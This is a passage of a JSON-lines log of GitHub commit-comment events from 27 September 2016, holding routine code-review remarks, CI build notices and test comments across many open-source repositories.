configuration.\r\n\r\nDoes that make sense?\r\n"}},"created_at":"2016-09-27T09:09:12Z"}
{"id":"4622889668","type":"CommitCommentEvent","actor":{"login":"mvaudel"},"repo":{"name":"compomics/peptide-shaker"},"payload":{"comment":{"id":19187281,"position":null,"line":null,"path":null,"commit_id":"4d80aa97ab7bdbc92978f7275b7897bc10a4ce84","created_at":"2016-09-27T09:09:43Z","updated_at":"2016-09-27T09:09:43Z","body":"Oooops - wrong branch!"}},"created_at":"2016-09-27T09:09:43Z"}
{"id":"4622889899","type":"CommitCommentEvent","actor":{"login":"zoltrain"},"repo":{"name":"andreugrimalt/flashlight"},"payload":{"comment":{"id":19187282,"position":4,"line":57,"path":"config.js","commit_id":"db3aa1032adc2bbd09859b90ffe7c69347e4b2c7","created_at":"2016-09-27T09:09:46Z","updated_at":"2016-09-27T09:09:46Z","body":"\"All the objects in that path will be concatenated into an array on objects\" should be \"All the objects in that path will be concatenated into an array of objects\""}},"created_at":"2016-09-27T09:09:46Z"}
{"id":"4622894885","type":"CommitCommentEvent","actor":{"login":"Aokromes"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19187288,"position":null,"line":null,"path":null,"commit_id":"aeb20951bbac5453d5a4db22d23516ba8f948275","created_at":"2016-09-27T09:10:45Z","updated_at":"2016-09-27T09:10:45Z","body":"it builded localy :P"}},"created_at":"2016-09-27T09:10:45Z"}
{"id":"4622903551","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/bahn.guru"},"payload":{"comment":{"id":19187301,"position":13,"line":19,"path":"route.js","commit_id":"f5b6489bb8007751aa8566117ca905385de05be1","created_at":"2016-09-27T09:12:27Z","updated_at":"2016-09-27T09:12:27Z","body":"Shouldn't that be `500`?"}},"created_at":"2016-09-27T09:12:27Z"}
{"id":"4622905137","type":"CommitCommentEvent","actor":{"login":"julianoes"},"repo":{"name":"PX4/DriverFramework"},"payload":{"comment":{"id":19187305,"position":null,"line":null,"path":null,"commit_id":"6bdc8bce97c619a77276d183f88ee2d6efce4cbf","created_at":"2016-09-27T09:12:45Z","updated_at":"2016-09-27T09:12:45Z","body":"Ok, so the implementation is correct but the comment wrong. I'll fix it."}},"created_at":"2016-09-27T09:12:45Z"}
{"id":"4622906063","type":"CommitCommentEvent","actor":{"login":"gravitystorm"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19187307,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-27T09:12:56Z","updated_at":"2016-09-27T09:12:56Z","body":"The best place is the maintainer(s) of the project, not some external group."}},"created_at":"2016-09-27T09:12:56Z"}
{"id":"4622909274","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/bahn.guru"},"payload":{"comment":{"id":19187314,"position":16,"line":21,"path":"route.js","commit_id":"f5b6489bb8007751aa8566117ca905385de05be1","created_at":"2016-09-27T09:13:32Z","updated_at":"2016-09-27T09:13:32Z","body":"Shouldn't that be `500`?"}},"created_at":"2016-09-27T09:13:32Z"}
{"id":"4622912372","type":"CommitCommentEvent","actor":{"login":"Yanodamano"},"repo":{"name":"Yanodamano/blink-and-its-gone"},"payload":{"comment":{"id":19187318,"position":null,"line":null,"path":null,"commit_id":"95fa19c5cf2578abe483a810d2319e6466dfb6ba","created_at":"2016-09-27T09:14:09Z","updated_at":"2016-09-27T09:14:09Z","body":"just a quick commit"}},"created_at":"2016-09-27T09:14:09Z"}
{"id":"4622914021","type":"CommitCommentEvent","actor":{"login":"Yanodamano"},"repo":{"name":"Yanodamano/blink-and-its-gone"},"payload":{"comment":{"id":19187319,"position":null,"line":null,"path":null,"commit_id":"95fa19c5cf2578abe483a810d2319e6466dfb6ba","created_at":"2016-09-27T09:14:27Z","updated_at":"2016-09-27T09:14:27Z","body":"ffffff"}},"created_at":"2016-09-27T09:14:27Z"}
{"id":"4622914595","type":"CommitCommentEvent","actor":{"login":"lexuanquynh"},"repo":{"name":"CocoaPods/blog.cocoapods.org"},"payload":{"comment":{"id":19187320,"position":25,"line":221,"path":"_posts/2014-12-25-Pod-Authors-Guide-to-CocoaPods-Frameworks.markdown","commit_id":"6933ae5ccfc1e0b39dd23f4ec67d7a083975836d","created_at":"2016-09-27T09:14:32Z","updated_at":"2016-09-27T09:14:32Z","body":"what is this?"}},"created_at":"2016-09-27T09:14:32Z"}
{"id":"4622915176","type":"CommitCommentEvent","actor":{"login":"ChristophBerg"},"repo":{"name":"theory/pgtap"},"payload":{"comment":{"id":19187321,"position":null,"line":null,"path":null,"commit_id":"5ad76e25067463a863b12a13cfd3203f82595f9f","created_at":"2016-09-27T09:14:38Z","updated_at":"2016-09-27T09:14:38Z","body":"Re: David E. Wheeler 2016-09-26 <theory/pgtap/commit/5ad76e25067463a863b12a13cfd3203f82595f9f/19180790@github.com>\n> What changes? I have not had time to get my pg builds working for a while…\n\nHi,\n\nit was late last night, and I was only looking at regression.diffs.\nWhat I did was to add the following _N.out alternate expected files:\n\nhttps://anonscm.debian.org/cgit/pkg-postgresql/pgtap.git/tree/debian/patches/9.6#n263\n\nOn a closer look, I now realize that I should probably have fixed the\nunderlying tap tests instead of accepting \"not ok\" as valid results.\n\nAnyway, the difference in the 3 cases is always that the error CONTEXT\nhas an extra \"PL/pgSQL function todo_end() line 7 at RAISE\" line, best\nvisible in line 263 of the above URL.\n\n(If it helps, I can move this to a proper issue report, instead of\nhijacking an unrelated PG 10 change, sorry for that.)\n\nChristoph\n"}},"created_at":"2016-09-27T09:14:38Z"}
{"id":"4622915821","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/bahn.guru"},"payload":{"comment":{"id":19187323,"position":21,"line":25,"path":"route.js","commit_id":"f5b6489bb8007751aa8566117ca905385de05be1","created_at":"2016-09-27T09:14:47Z","updated_at":"2016-09-27T09:14:47Z","body":"I don't have the code in mind anymore, but for invalid requests, it should be `400`, for server errors `500`."}},"created_at":"2016-09-27T09:14:47Z"}
{"id":"4622917612","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19187327,"position":30,"line":30,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-27T09:15:07Z","updated_at":"2016-09-27T09:15:07Z","body":"I'm not sure a network-wide thing like this one is suitable for being event-driven: I can't think of any kind of event that doesn't grow linearly with the network size. I also can't think of an event that every node on the network would be aware of simultaneously.\r\n\r\nI agree that using time is problematic, too. But I can't think of another feasible option at the moment."}},"created_at":"2016-09-27T09:15:07Z"}
{"id":"4622921507","type":"CommitCommentEvent","actor":{"login":"julbra"},"repo":{"name":"chimurai/http-proxy-middleware"},"payload":{"comment":{"id":19187335,"position":null,"line":null,"path":null,"commit_id":"53fe79b6c36ca4034c3fd68ffb29bcc81d84e576","created_at":"2016-09-27T09:15:48Z","updated_at":"2016-09-27T09:15:48Z","body":"@chimurai fixes the bug, ship it ;)"}},"created_at":"2016-09-27T09:15:48Z"}
{"id":"4622922737","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19187336,"position":null,"line":null,"path":null,"commit_id":"34f81a8c6361873dbf37a27bc7125673d4403dc0","created_at":"2016-09-27T09:16:02Z","updated_at":"2016-09-27T09:16:02Z","body":"OK, there is a commit that break this functionality in video drivers..... Thanks :)"}},"created_at":"2016-09-27T09:16:02Z"}
{"id":"4622923400","type":"CommitCommentEvent","actor":{"login":"Jinkuan"},"repo":{"name":"Jinkuan/JZFenQi"},"payload":{"comment":{"id":19187337,"position":null,"line":null,"path":null,"commit_id":"0c0b8baf22848126223d67cfc724507ad1236093","created_at":"2016-09-27T09:16:10Z","updated_at":"2016-09-27T09:16:10Z","body":"哈哈，在来一次😄"}},"created_at":"2016-09-27T09:16:10Z"}
{"id":"4622923405","type":"CommitCommentEvent","actor":{"login":"rolfbjarne"},"repo":{"name":"rolfbjarne/HockeySDK-Xamarin"},"payload":{"comment":{"id":19187338,"position":10,"line":32,"path":"source/HockeySDK.iOSBindings/Additions.cs","commit_id":"862721199f1adec210bfc7b1943f975ffb8048a9","created_at":"2016-09-27T09:16:10Z","updated_at":"2016-09-27T09:16:10Z","body":"Why the double try? What can happen that needs everything to be in a finally clause?\r\n\r\nI would have thought the following would be enough:\r\n\r\n    RemoveSignalHandlers ();\r\n    try {\r\n        DoStartManager ();\r\n    } finally {\r\n        InstallSignalHandlers ();\r\n    }"}},"created_at":"2016-09-27T09:16:10Z"}
{"id":"4622925456","type":"CommitCommentEvent","actor":{"login":"JhetoX"},"repo":{"name":"JhetoX/PokemonGO"},"payload":{"comment":{"id":19187343,"position":null,"line":null,"path":null,"commit_id":"20c58f3c1c976f2774c021279d1e08323ff968b2","created_at":"2016-09-27T09:16:31Z","updated_at":"2016-09-27T09:16:31Z","body":"You are kidding me ?"}},"created_at":"2016-09-27T09:16:31Z"}
{"id":"4622928287","type":"CommitCommentEvent","actor":{"login":"lucasmaystre"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19187357,"position":39,"line":39,"path":"footparse/eloratings.py","commit_id":"489e0bb4cfe0cc4d3edb8579ba6f160cf27976a4","created_at":"2016-09-27T09:17:05Z","updated_at":"2016-09-27T09:17:05Z","body":"How about `match_info`? (In this dict there's the date, the competition, etc.)"}},"created_at":"2016-09-27T09:17:05Z"}
{"id":"4622929887","type":"CommitCommentEvent","actor":{"login":"a0119754"},"repo":{"name":"a0119754/CS3210Assignment"},"payload":{"comment":{"id":19187365,"position":null,"line":null,"path":null,"commit_id":"751e58dec1800ce9660800b2a1f015ee845c9b05","created_at":"2016-09-27T09:17:24Z","updated_at":"2016-09-27T09:17:24Z","body":"Alos, I Googled. The term where main memory is accessed in a pattern that leads to multiple main memory locations competing for the same cache lines, resulting in excessive cache misses is \"cache thrashing\"\r\nhttps://en.wikipedia.org/wiki/Thrashing_(computer_science)"}},"created_at":"2016-09-27T09:17:24Z"}
{"id":"4622934651","type":"CommitCommentEvent","actor":{"login":"gplanchat"},"repo":{"name":"akeneo/batch"},"payload":{"comment":{"id":19187372,"position":32,"line":32,"path":"Item/ItemWriterInterface.php","commit_id":"5e9e39c4942290bbb021ec66cae12ac804dd3fbd","created_at":"2016-09-27T09:18:19Z","updated_at":"2016-09-27T09:18:19Z","body":"Using `\\Traversable` interface as a type hint could bring some more options for the ones implementing export jobs. All SPL objects implementing `\\Iterator` or `\\IteratorAggregate` will work, `\\Generator` will also do, and array can be passed through an `\\ArrayIterator`\r\n\r\nAs long as the batch size is known in advance (configured in the `jobs.yml`), a `SplFixedArray` may do the trick, with a very small memory  footprint. From the PHP engine point of view it is a `ZVAL[]` array.\r\n\r\nhttp://php.net/manual/fr/class.splfixedarray.php"}},"created_at":"2016-09-27T09:18:19Z"}
{"id":"4622934793","type":"CommitCommentEvent","actor":{"login":"xCrystal"},"repo":{"name":"TheFakeMateo/RedPlusPlus"},"payload":{"comment":{"id":19187373,"position":null,"line":null,"path":null,"commit_id":"9c246adf7aa8d765001d416d4d4b878000b1624d","created_at":"2016-09-27T09:18:21Z","updated_at":"2016-09-27T09:18:21Z","body":"You may want to add special cases for the likes of hyperbeam, explosion and recoil effects so that they are not zeroed if they break a substitute: https://github.com/TheFakeMateo/RedPlusPlus/blob/9c246ad/engine/battle/core.asm#L5184"}},"created_at":"2016-09-27T09:18:21Z"}
{"id":"4622935691","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":19187377,"position":4,"line":50,"path":"application/src/main/webapp/js/desktopNotification.js","commit_id":"a89a32b2f00f7e31f5f1a40cfe8e45f79de9985a","created_at":"2016-09-27T09:18:31Z","updated_at":"2016-09-27T09:18:31Z","body":"Should be removed."}},"created_at":"2016-09-27T09:18:31Z"}
{"id":"4622939443","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":19187386,"position":5,"line":1141,"path":"application/src/main/webapp/js/chat-modules.js","commit_id":"a89a32b2f00f7e31f5f1a40cfe8e45f79de9985a","created_at":"2016-09-27T09:19:15Z","updated_at":"2016-09-27T09:19:15Z","body":"I generally see callback parameter as the last parameter in functions, looks like a convention in javascript. WDYT ?"}},"created_at":"2016-09-27T09:19:15Z"}
{"id":"4622939989","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"volodden/YaPyN"},"payload":{"comment":{"id":19187387,"position":null,"line":null,"path":null,"commit_id":"eb6c0bf42f9614bd82bd9f0a0cfdac4dccc20203","created_at":"2016-09-27T09:19:20Z","updated_at":"2016-09-27T09:19:20Z","body":"YaPyN/YaPyN/yapyn.aps не нужен в git\r\n"}},"created_at":"2016-09-27T09:19:20Z"}
{"id":"4622942984","type":"CommitCommentEvent","actor":{"login":"julianoes"},"repo":{"name":"PX4/DriverFramework"},"payload":{"comment":{"id":19187391,"position":null,"line":null,"path":null,"commit_id":"6bdc8bce97c619a77276d183f88ee2d6efce4cbf","created_at":"2016-09-27T09:19:56Z","updated_at":"2016-09-27T09:19:56Z","body":"See: https://github.com/PX4/DriverFramework/pull/148"}},"created_at":"2016-09-27T09:19:56Z"}
{"id":"4622945071","type":"CommitCommentEvent","actor":{"login":"1269085759"},"repo":{"name":"1269085759/up6-jsp-mysql"},"payload":{"comment":{"id":19187395,"position":29,"line":34,"path":"src/down2/biz/folder_appender.java","commit_id":"e1c2523515049b1979b7513ebdb0d6b85a65b133","created_at":"2016-09-27T09:20:20Z","updated_at":"2016-09-27T09:20:20Z","body":"这一句可以优化，取消int转string，直接全用int类型。"}},"created_at":"2016-09-27T09:20:20Z"}
{"id":"4622947163","type":"CommitCommentEvent","actor":{"login":"1269085759"},"repo":{"name":"1269085759/up6-jsp-mysql"},"payload":{"comment":{"id":19187400,"position":25,"line":30,"path":"src/down2/biz/folder_appender.java","commit_id":"e1c2523515049b1979b7513ebdb0d6b85a65b133","created_at":"2016-09-27T09:20:45Z","updated_at":"2016-09-27T09:20:45Z","body":"将这个数组类型改Integer[]"}},"created_at":"2016-09-27T09:20:45Z"}
{"id":"4622950941","type":"CommitCommentEvent","actor":{"login":"andersio"},"repo":{"name":"ReactiveCocoa/ReactiveSwift"},"payload":{"comment":{"id":19187405,"position":24,"line":108,"path":"Sources/Action.swift","commit_id":"c8791b7a75123e4885262b7da5cdbc5f7bb8668f","created_at":"2016-09-27T09:21:29Z","updated_at":"2016-09-27T09:21:29Z","body":"I wonder if `isExecuting` should be reset to `false` here."}},"created_at":"2016-09-27T09:21:29Z"}
{"id":"4622953258","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19187410,"position":null,"line":null,"path":null,"commit_id":"6dc773c0a9f6afead7e4ab387b057399253f3176","created_at":"2016-09-27T09:21:57Z","updated_at":"2016-09-27T09:21:57Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Wy2PQs7LRACOTPjaZ3rHpw"}},"created_at":"2016-09-27T09:21:57Z"}
{"id":"4622953949","type":"CommitCommentEvent","actor":{"login":"benjioh5"},"repo":{"name":"HYU-ICEWALL/server-manuel"},"payload":{"comment":{"id":19187411,"position":null,"line":null,"path":null,"commit_id":"da8936749cfb35a1ab0950d599fa743279dc349a","created_at":"2016-09-27T09:22:05Z","updated_at":"2016-09-27T09:22:05Z","body":"뭘 한거니...."}},"created_at":"2016-09-27T09:22:05Z"}
{"id":"4622954183","type":"CommitCommentEvent","actor":{"login":"audio99"},"repo":{"name":"birchsport/titanic"},"payload":{"comment":{"id":19187412,"position":null,"line":null,"path":null,"commit_id":"d4136a8849f6eecf02dc268ba24f74743cfa1d6a","created_at":"2016-09-27T09:22:08Z","updated_at":"2016-09-27T09:22:08Z","body":"im sorry,but how your program works?"}},"created_at":"2016-09-27T09:22:08Z"}
{"id":"4622954256","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"volodden/YaPyN"},"payload":{"comment":{"id":19187413,"position":null,"line":null,"path":null,"commit_id":"09232e4c8cb071fd2d768e9d3a13042bb2316960","created_at":"2016-09-27T09:22:09Z","updated_at":"2016-09-27T09:22:09Z","body":" YaPyN.VC.db\r\nx64/Release/Editor.iobj\r\nYaPyN.VC.db\r\nне нужны в git"}},"created_at":"2016-09-27T09:22:09Z"}
{"id":"4622956124","type":"CommitCommentEvent","actor":{"login":"janhenkgerritsen"},"repo":{"name":"davidkpiano/react-redux-form"},"payload":{"comment":{"id":19187421,"position":30,"line":30,"path":"native.js","commit_id":"b5bbd4de56157db0fe0154719650fcabd2200222","created_at":"2016-09-27T09:22:28Z","updated_at":"2016-09-27T09:22:28Z","body":"This probably should be `./src/index`."}},"created_at":"2016-09-27T09:22:28Z"}
{"id":"4622956589","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19187422,"position":6,"line":25,"path":"src/builder/webpack/config.node.js","commit_id":"3a0fdbfd104858a12ed86ef6db54df565e34a44d","created_at":"2016-09-27T09:22:34Z","updated_at":"2016-09-27T09:22:34Z","body":"Hum. This looks like a babel bug to me. What will babel do if you require the module directly? "}},"created_at":"2016-09-27T09:22:34Z"}
{"id":"4622957801","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"volodden/YaPyN"},"payload":{"comment":{"id":19187424,"position":null,"line":null,"path":null,"commit_id":"a8cedeab82c8e9e3089aeeebf6c8c4a43310f6df","created_at":"2016-09-27T09:22:48Z","updated_at":"2016-09-27T09:22:48Z","body":"настройте .gitignore"}},"created_at":"2016-09-27T09:22:48Z"}
{"id":"4622959934","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19187427,"position":null,"line":null,"path":null,"commit_id":"abe9f2550c1dc53af8d53019d970995388438444","created_at":"2016-09-27T09:23:13Z","updated_at":"2016-09-27T09:23:13Z","body":"- Added 4 new widgets\r\n- Added current day temperature values\r\n- Resized the widgets thumbnails"}},"created_at":"2016-09-27T09:23:13Z"}
{"id":"4622961317","type":"CommitCommentEvent","actor":{"login":"Lazzi"},"repo":{"name":"matk0/ticketee"},"payload":{"comment":{"id":19187429,"position":5,"line":10,"path":"app/controllers/projects_controller.rb","commit_id":"d8c1ee2fdd5c36b2305b9227f57b1f8b0e767ab4","created_at":"2016-09-27T09:23:28Z","updated_at":"2016-09-27T09:23:28Z","body":"I would expect method tagged_with to return empty relation when passed tag, that is not used within project."}},"created_at":"2016-09-27T09:23:28Z"}
{"id":"4622961743","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"volodden/YaPyN"},"payload":{"comment":{"id":19187431,"position":5,"line":20,"path":"YaPyN/YaPyN/YaPyN_MainWindow.cpp","commit_id":"4341cebf2a146a13a3c5bf21fd1537f66ac47be0","created_at":"2016-09-27T09:23:33Z","updated_at":"2016-09-27T09:23:33Z","body":"почему не unicode?"}},"created_at":"2016-09-27T09:23:33Z"}
{"id":"4622963257","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19187432,"position":null,"line":null,"path":null,"commit_id":"401a6bcee386aeff7b25b97e264337181f1b7a01","created_at":"2016-09-27T09:23:50Z","updated_at":"2016-09-27T09:23:50Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#KTZSVN1nThuBdONTznVshA"}},"created_at":"2016-09-27T09:23:50Z"}
{"id":"4622965715","type":"CommitCommentEvent","actor":{"login":"Lazzi"},"repo":{"name":"matk0/ticketee"},"payload":{"comment":{"id":19187436,"position":26,"line":26,"path":"app/models/ticket.rb","commit_id":"d8c1ee2fdd5c36b2305b9227f57b1f8b0e767ab4","created_at":"2016-09-27T09:24:18Z","updated_at":"2016-09-27T09:24:18Z","body":"Maybe just replace with:\r\n`Tag.find_by_name(name).try(:tickets) || Ticket.none`"}},"created_at":"2016-09-27T09:24:18Z"}
{"id":"4622968523","type":"CommitCommentEvent","actor":{"login":"MoOx"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19187444,"position":6,"line":25,"path":"src/builder/webpack/config.node.js","commit_id":"3a0fdbfd104858a12ed86ef6db54df565e34a44d","created_at":"2016-09-27T09:24:50Z","updated_at":"2016-09-27T09:24:50Z","body":"This is not the source of the issue. The fact that sourcemap can be in node_modules/phenomic/node_modules or directly in node_modules is.\r\nI added this while I was debugging, just in case :) (cause I was getting babel-register weird message)."}},"created_at":"2016-09-27T09:24:50Z"}
{"id":"4622970201","type":"CommitCommentEvent","actor":{"login":"naufalizee"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19187449,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-27T09:25:11Z","updated_at":"2016-09-27T09:25:11Z","body":"as always thanks for the great work!\r\ndream is it possible to pause/change when hero reach certain lv ex:lv 29\r\nit will be very helpful if can so tommorow farming can be done in single day\r\nand then the day after just lvling to 29-30 \r\nsorry for bad eng "}},"created_at":"2016-09-27T09:25:11Z"}
{"id":"4622972714","type":"CommitCommentEvent","actor":{"login":"daniel-j-h"},"repo":{"name":"Project-OSRM/osrm-backend"},"payload":{"comment":{"id":19187457,"position":28,"line":261,"path":"profiles/car.lua","commit_id":"f948fb081b50c922969da5b1564b787781409ffa","created_at":"2016-09-27T09:25:38Z","updated_at":"2016-09-27T09:25:38Z","body":"> gmatch iterator fails when called from a coroutine different from the one that created it.\r\n\r\nProfiles are not using coroutines."}},"created_at":"2016-09-27T09:25:38Z"}
{"id":"4622972784","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"volodden/YaPyN"},"payload":{"comment":{"id":19187459,"position":41,"line":56,"path":"Editor/YaPyN_MainWindow.cpp","commit_id":"b80c00c2688e608a4787f5257c7cfe790a67ae74","created_at":"2016-09-27T09:25:39Z","updated_at":"2016-09-27T09:25:39Z","body":"Что делает этот код?"}},"created_at":"2016-09-27T09:25:39Z"}
{"id":"4622972863","type":"CommitCommentEvent","actor":{"login":"lyouw"},"repo":{"name":"lyouw/sweet"},"payload":{"comment":{"id":19187460,"position":null,"line":null,"path":null,"commit_id":"def16ad8109d6c39be720edee7aaa7f84f1eb4b1","created_at":"2016-09-27T09:25:40Z","updated_at":"2016-09-27T09:25:40Z","body":"hello world"}},"created_at":"2016-09-27T09:25:40Z"}
{"id":"4622977396","type":"CommitCommentEvent","actor":{"login":"jaisairohan"},"repo":{"name":"jaisairohan/git"},"payload":{"comment":{"id":19187465,"position":null,"line":null,"path":null,"commit_id":"8d7f1d94349fea2c725b2c5cb3adf274a99347a4","created_at":"2016-09-27T09:26:34Z","updated_at":"2016-09-27T09:26:34Z","body":"added to change"}},"created_at":"2016-09-27T09:26:34Z"}
{"id":"4622977645","type":"CommitCommentEvent","actor":{"login":"chrisseaton"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19187466,"position":4,"line":650,"path":"truffle/src/main/c/cext/ruby.c","commit_id":"601b267202430491127716af7d70c62e2cf9ca2c","created_at":"2016-09-27T09:26:36Z","updated_at":"2016-09-27T09:26:36Z","body":"Wow this is like a little partial evaluator. I'll keep this link and definitely come back to it later."}},"created_at":"2016-09-27T09:26:36Z"}
{"id":"4622980940","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"ReOpen/ReOpenLDAP"},"payload":{"comment":{"id":19187471,"position":null,"line":null,"path":null,"commit_id":"57194b0ee5c4b8f36d25cb7cf8ba84312674571a","created_at":"2016-09-27T09:27:13Z","updated_at":"2016-09-27T09:27:13Z","body":"TeamCity ReOpenLDAP :: master [Build 67](https://binbug.bigbrother-matrix.ru/teamcity/viewLog.html?buildId=2799&buildTypeId=ReOpenLDAP_Master&guest=1) is now running\n"}},"created_at":"2016-09-27T09:27:13Z"}
{"id":"4622980943","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"ReOpen/ReOpenLDAP"},"payload":{"comment":{"id":19187472,"position":null,"line":null,"path":null,"commit_id":"01b606df5e19f4892ef02e94e19b073737c4d07d","created_at":"2016-09-27T09:27:13Z","updated_at":"2016-09-27T09:27:13Z","body":"TeamCity ReOpenLDAP :: master [Build 67](https://binbug.bigbrother-matrix.ru/teamcity/viewLog.html?buildId=2799&buildTypeId=ReOpenLDAP_Master&guest=1) is now running\n"}},"created_at":"2016-09-27T09:27:13Z"}
{"id":"4622982727","type":"CommitCommentEvent","actor":{"login":"a809472324"},"repo":{"name":"a809472324/Hello-World"},"payload":{"comment":{"id":19187474,"position":null,"line":null,"path":null,"commit_id":"c1c2dc5b9c21e3cba5516a02387ed3ff56f4b757","created_at":"2016-09-27T09:27:33Z","updated_at":"2016-09-27T09:27:33Z","body":"This is the first time i arrive here.Let's play toghther."}},"created_at":"2016-09-27T09:27:33Z"}
{"id":"4622982930","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Cenisys"},"payload":{"comment":{"id":19187475,"position":null,"line":null,"path":null,"commit_id":"991bd6989bcc155a05da736ae45b7b184a8f26c5","created_at":"2016-09-27T09:27:35Z","updated_at":"2016-09-27T09:27:35Z","body":"Wipeout! I guess you really are starting again then?"}},"created_at":"2016-09-27T09:27:35Z"}
{"id":"4622983265","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"volodden/YaPyN"},"payload":{"comment":{"id":19187477,"position":null,"line":null,"path":null,"commit_id":"cebb2c02e2737ae631fac2d03e7371417fd45786","created_at":"2016-09-27T09:27:39Z","updated_at":"2016-09-27T09:27:39Z","body":"*.suo -> .gitignore"}},"created_at":"2016-09-27T09:27:39Z"}
{"id":"4622985953","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19187484,"position":1,"line":1,"path":"3454","commit_id":"77cc5cd74fc8766922abee74e114f2cafcbab0f2","created_at":"2016-09-27T09:28:10Z","updated_at":"2016-09-27T09:28:10Z","body":"asdasd"}},"created_at":"2016-09-27T09:28:10Z"}
{"id":"4622989882","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19187491,"position":null,"line":null,"path":null,"commit_id":"7b0788be832a77de2cb1ca7226b24e9a435cbd59","created_at":"2016-09-27T09:28:55Z","updated_at":"2016-09-27T09:28:55Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Ph9vl14nTaOS3_tCQB141Q"}},"created_at":"2016-09-27T09:28:55Z"}
{"id":"4622990355","type":"CommitCommentEvent","actor":{"login":"stevenjack"},"repo":{"name":"vidsy/static-assets"},"payload":{"comment":{"id":19187492,"position":null,"line":null,"path":null,"commit_id":"12d92a46a7a5e0a5f9e02434dc4185785b01869d","created_at":"2016-09-27T09:29:00Z","updated_at":"2016-09-27T09:29:00Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[SA 12d92a4] The upload video image on the client side needs to be changed to a pattern - As they cant actually upload an image!](https://trello.com/c/tfratpaY/579-sa-12d92a4-the-upload-video-image-on-the-client-side-needs-to-be-changed-to-a-pattern-as-they-cant-actually-upload-an-image)"}},"created_at":"2016-09-27T09:29:00Z"}
{"id":"4622993043","type":"CommitCommentEvent","actor":{"login":"volodden"},"repo":{"name":"volodden/YaPyN"},"payload":{"comment":{"id":19187496,"position":null,"line":null,"path":null,"commit_id":"a8cedeab82c8e9e3089aeeebf6c8c4a43310f6df","created_at":"2016-09-27T09:29:29Z","updated_at":"2016-09-27T09:29:29Z","body":"done.\r\nhttps://github.com/volodden/YaPyN/pull/3"}},"created_at":"2016-09-27T09:29:29Z"}
{"id":"4622994228","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19187499,"position":6,"line":25,"path":"src/builder/webpack/config.node.js","commit_id":"3a0fdbfd104858a12ed86ef6db54df565e34a44d","created_at":"2016-09-27T09:29:42Z","updated_at":"2016-09-27T09:29:42Z","body":"> The fact that sourcemap can be in node_modules/phenomic/node_modules or directly in node_modules is\r\n\r\nThis is not an issue at all. Node can resolve this. `require` and `require.resolve` have the same resolving algorithm. The different is the later return a full path to the module instead of the actual module. This trick looks ugly to me"}},"created_at":"2016-09-27T09:29:42Z"}
{"id":"4622995013","type":"CommitCommentEvent","actor":{"login":"mikelmaron"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19187501,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-27T09:29:51Z","updated_at":"2016-09-27T09:29:51Z","body":"Of course the Board is not just some external group, the OSM Foundation is responsible in an official capacity for the openstreetmap GitHub organization. \r\n\r\nIf @tomhughes would like to take on this responsibility, great. If not, Board is one viable option."}},"created_at":"2016-09-27T09:29:51Z"}
{"id":"4622995490","type":"CommitCommentEvent","actor":{"login":"FlatOutPS2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19187503,"position":null,"line":null,"path":null,"commit_id":"e0961d81a0cff81f147689d6fc135ab94dfcda6a","created_at":"2016-09-27T09:29:56Z","updated_at":"2016-09-27T09:29:56Z","body":"This removed most of the texture issues that were left in Legacy Of Kain. :)"}},"created_at":"2016-09-27T09:29:56Z"}
